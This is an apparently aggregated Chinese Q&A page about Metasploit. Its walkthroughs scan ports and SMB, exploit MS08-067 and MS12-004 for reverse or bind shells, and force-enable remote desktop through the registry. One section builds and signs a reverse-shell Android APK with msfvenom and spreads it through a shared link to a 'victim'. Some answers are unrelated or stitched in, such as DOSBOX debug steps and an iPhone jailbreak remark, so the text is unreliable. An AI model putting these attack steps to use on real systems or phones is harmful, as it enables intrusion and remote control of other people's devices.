metasploit命令

❶ 如何用Metasploit扫描端口

一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具：searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions

我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口，我们这里来扫描80：set PORTS 80
设置扫描目标RHOSTS ：set RHOSTS 119.63.37.149
在设置一下线程：set THREADS 100
看一下我们设置好的

这时候我们都设置好了，我们来攻击下，看看效果，用命令run进行攻击
缺点就是扫描的速度有点慢啊

MetaSploit SMB扫描获取系统信息
还是搜索一下smb：searchsmb

这次发现搜出来很多，我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数

设定目标ip：set RHOSTS 192.168.188.140
在设置一下线程：set THREAD 10
然后run一下，查看结果

直接扫描出来小伙伴的系统还有主机名，速度不到1s，很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块：use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数，这里讲设置好的参数截图看一下

Run一下看看结果，其实没有扫出来，好像是屏蔽了，但是用nmap却扫出来了ssh

在试一下ftp，用这个模块：use auxiliary/scanner/ftp/ftp_version
设置下参数

可以看到结果，也没有扫描出来；
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置

这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行
搜索一下08-067，使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置

我们只要设置一下目标就可以，然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数

将LHOST 设置为自己的ip（对外攻击不要忘了段口转发）
比如说知道对面的系统是什么版本，可以指定targer，用target查看一下都有什么版本

设置一下目标，假设我们目标机器的系统为10：set target 10
这时候，我们再来看一下其参数设置，发现比以前完备了好多

08-067是不会自动识别系统版本的，但是其他的可以自动识别，所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter>
我们在里面输入shell，就会反弹一个shell
这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004

设置下本机ip set SRVHOST ip
然后攻击

会生成一个连接，但是这个链接容易让人发现，所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时，会发现报红，因为4444端口被占用了，所以我们改下监听端口 set LPORT 5555
然后生成连接

只要目标点了这个链接，那么我们就会上线一个shell
说一下，目标点击后我们这边并没有反映，我们需要输下session查看当前会话，会找到上线的机子，连接上线的机子
Session –I 1（id）
然后输入shell就可以拿到shell

❷ win10怎么打开metasploit

（1）在互联网上下载DOSBOX、DEBUG32.EXE或debug.exe程序，把DOSBOX程序安装 在计算机中。 DEBUG32.EXE或debug.exe程序。
（2）在已知路径的文件夹中存储DEBUG32.EXE或debug.exe程序。
（3）双击桌面上的运行安装好的DOSBOX程序。
（4）依次输入以下命令：
1> Mount c f：\1 *********** 这个指令的意思是将1这个文件夹挂载为DOSBOX的C盘（这样1文件夹就是DOSBOX的C盘）
2> C： *********** 切换到C盘 3> Debug32
总结：上面的界面窗口已经打开了debug，其后操作和操作debug相同，退出时输入命令：quit 并点击enter键，就退出debug调试，重新进入DOSBOX程序中。

❸ 如何安装metasploit

一、搭建metasploit环境
Windows环境下安装

metasploit

安装时需要注意要关闭杀毒软件，如果安装有杀毒软件，会提示在metasploit的安装目录下检测到病毒或木马。
二、metasploit的使用
Metasploit目前提供了三种用户使用接口，一个是GUI模式，另一个是console模式，第三种是CLI（命令行）模式。原来还提供一种WEB模式，目前已经不再支持。目前这三种模式各有优缺点，建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能，还可以在console中执行一些其它的外部命令，如ping。
Windows下GUI启动方式，从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示：

其GUI模式启动后界面如图2所示：

Windows下console模式的启动方式与GUI方式类似，启动后界面如图3所示：

Metasploit的使用较为简单，了解其基本命令即可。下面以console的使用方式为例说明如何使用：
输入help或？可查看帮助信息。

下面以exploit中的ms04_045_wins为例进行说明。
1、show exploits，
2、info exploit/windows/wins/ms04_045_wins，查看其描述信息。

3、use exploit/windows/wins/ms04_045_wins，使用此exploit。

4、show options，查看相应的选项

5、set RHOST 192.168.1.200，设置目标
6、set RPORT 7777，设置端口
7、set PAYLOAD generic/shell_bind_tcp，设置使用的shellcode
8、exploit，执行攻击

❹ 高手救命~~~ 使用metasploit侵入目标机器（我只是在自己装的虚拟机做实验~~~）

如下图：

这个情况是无法进入对方远程的 要开启箭头所指的才可以进行远程控制

输入命令以下命令查看端口情况

netstat -an 查看端口 看有没有3389这个 如果没有用命令开启对方的3389端口：REG ADD " "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这条命令：REG ADD " "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 是强制允许进行任何远程操作

再用远程控制输入你所设置的账号密码就可以了

希望对你有所帮助

❺ metasploit 数据库连接问题

您好，metasploit中也默认使用postgres数据库,要连接数据库。首先查看数据库服务是否开启，shell命令：
netstat
-tnpl
|
grep
postgres
记下端口，一会连接数据库时需要。在去查看postgres数据库用户名和密码
在/opt/metasploit/config/database.yml这个配置文件中
进入metasploit命令行界面：使用命令db_connect
可连接数据库，具体命令：db_connect
username:password@localhost:端口号/数据库名
输入db_status即可看到连接的数据库

❻ 如何使用metasploit对安卓手机进行控制

在这次的实验中，我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制android设备。
创建负载
我们需要两台虚拟机：Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端，使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后，你会看到一些错误，但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式（APK）文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名：
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`

Kali没有预装Zipalign，需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK，它可以安装在任何设备上。

使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK，并将下载链接分享出去。

1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像，启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali，我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

❼ 怎样更新metasploit中的模块

1、打开msf，输入命令use auxiliary/gather/shodan_search。

注意事项：

Metasploit的设计初衷是打造成一个攻击工具开发平台，本书稍后将讲解如何开发攻击工具。然而在目前情况下，安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

❽ metasploit中,使用什么命令来加载模块

1、show 命令没有停按照时间排序的功能。
2、如果你想找具体的exploit可以受用search命令，search支持几种关键字的查询，但是也没有支持时间的。
3、Metploit的exploit模块除了用msfupdate升级之外，自己也可以写，或者向其他人要，或者使用付费的方式，或者最新的shellcode，所以其他人有也是正常的，看情况了。如果就你没有那就是你升级失败了。
出现exploit failed和fetching required files类似提示错误，是电脑安装新USB硬件驱动造成的，首先先换一个USB口试试，其次检查安装新的USB驱动的硬件，有部分驱动会和iPhone的USB驱动有冲突。当然开机F8带网络的安全模式红雪也是可以顺利越狱的，因为安全模式是不加载驱动的。

❾ metasploit中的命令set THREADS 10是什么意思

把攻击线程数设置成10个